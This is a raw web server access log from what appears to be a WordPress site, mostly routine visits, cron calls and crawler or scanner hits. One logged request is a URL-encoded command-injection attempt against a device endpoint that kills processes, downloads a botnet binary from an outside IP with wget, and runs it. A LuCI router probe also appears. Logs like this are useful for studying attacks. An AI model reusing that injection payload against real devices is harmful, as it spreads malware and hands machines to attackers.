170.106.11.6 - - [18/Oct/2025:19:36:58 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.89.70.31 - - [18/Oct/2025:20:01:20 +0800] "GET / HTTP/1.0" 200 153652 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
45.89.70.31 - - [18/Oct/2025:20:01:21 +0800] "GET /contacts/ HTTP/1.0" 200 76283 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [18/Oct/2025:20:01:23 +0800] "POST /wp-cron.php?doing_wp_cron=1760788883.1729528903961181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.89.70.31 - - [18/Oct/2025:20:01:24 +0800] "POST /contacts/ HTTP/1.0" 200 68820 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
185.242.226.102 - - [18/Oct/2025:20:09:20 +0800] "GET / HTTP/1.1" 499 0 "-" "python-requests/2.26.0"
36.133.115.36 - - [18/Oct/2025:20:09:21 +0800] "POST /wp-cron.php?doing_wp_cron=1760789361.3152060508728027343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [18/Oct/2025:20:11:43 +0800] "POST /wp-cron.php?doing_wp_cron=1760789503.2052240371704101562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
147.185.133.84 - - [18/Oct/2025:20:11:43 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
43.135.145.117 - - [18/Oct/2025:20:11:43 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Oct/2025:20:19:10 +0800] "POST /wp-cron.php?doing_wp_cron=1760789950.2120640277862548828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.41.165.59 - - [18/Oct/2025:20:19:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
121.43.154.219 - - [18/Oct/2025:20:19:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
112.124.67.140 - - [18/Oct/2025:20:19:50 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:20:20:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760790003.3490049839019775390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
120.26.86.89 - - [18/Oct/2025:20:20:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:20:24:10 +0800] "POST /wp-cron.php?doing_wp_cron=1760790250.7444369792938232421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.141.86 - - [18/Oct/2025:20:24:10 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
52.167.144.145 - - [18/Oct/2025:20:32:27 +0800] "GET /about/ HTTP/1.1" 200 30091 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:20:35:24 +0800] "POST /wp-cron.php?doing_wp_cron=1760790924.2812170982360839843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.96.129.4 - - [18/Oct/2025:20:35:24 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Oct/2025:20:42:57 +0800] "POST /wp-cron.php?doing_wp_cron=1760791377.2598741054534912109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.141.229 - - [18/Oct/2025:20:42:57 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=for%20pid%20in%20%2Fproc%2F%5B0-9%5D%2A%3B%20do%20case%20%24%28ls%20-l%20%24pid%2Fexe%29%20in%20%2A%27%28deleted%29%27%2A%7C%2A%27%2F.%27%2A%29%20kill%20-9%20%24%7Bpid%23%23%2A%2F%7D%20%3B%3B%20esac%3B%20done%3B%20while%20read%20-r%20line%3B%20do%20case%20%24line%20in%20%2A%22%2Fproc%2F%22%2A%29%20pid%3D%24%7Bline%23%23%2A%2Fproc%2F%7D%3B%20kill%20-9%20%24%7Bpid%25%25%20%2A%7D%3B%20%3B%3B%20esac%3B%20done%20%3C%20%2Fproc%2Fmounts%3Bcd%20%2Ftmp%3Brm%20arm7.urbotnetisass%3B%20wget%20http%3A%2F%2F94.154.35.154%2Farm7.urbotnetisass%3B%20chmod%20777%20%2A%3B%20.%2Farm7.urbotnetisass%20tbk HTTP/1.1" 404 8990 "-" "Mozila/5.0"
36.133.115.36 - - [18/Oct/2025:20:49:44 +0800] "POST /wp-cron.php?doing_wp_cron=1760791784.0177149772644042968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.141.87 - - [18/Oct/2025:20:50:03 +0800] "GET / HTTP/1.1" 200 45621 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
36.133.115.36 - - [18/Oct/2025:20:59:05 +0800] "POST /wp-cron.php?doing_wp_cron=1760792345.0388209819793701171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [18/Oct/2025:20:59:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
